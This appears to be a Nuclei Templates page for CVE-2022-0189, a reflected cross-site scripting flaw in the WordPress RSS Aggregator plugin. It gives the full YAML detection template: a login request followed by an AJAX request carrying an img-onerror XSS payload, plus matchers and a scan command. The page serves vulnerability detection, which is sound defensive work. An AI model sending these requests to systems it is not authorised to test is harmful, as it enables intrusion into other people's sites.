Skip to content
Nuclei Templates

WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting

ID: CVE-2022-0189

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator

Description

Section titled “Description”

WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0189


info:
  name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
  impact: |
    An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
    - https://plugins.trac.wordpress.org/changeset/2659298
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0189
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.41295
    cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wprssaggregator
    product: wp_rss_aggregator
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check


        id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src onerror=alert(`document.domain`)>"


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a004730450220339791c3e58685b888a1378c20853ce948b4b91886d9b18e656d99b19a7949500221009364b296f31abc88dd2a463779e6f23ec499444acfb57e2d33d6e0cf5d4f4939:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0189.yaml"

View on Github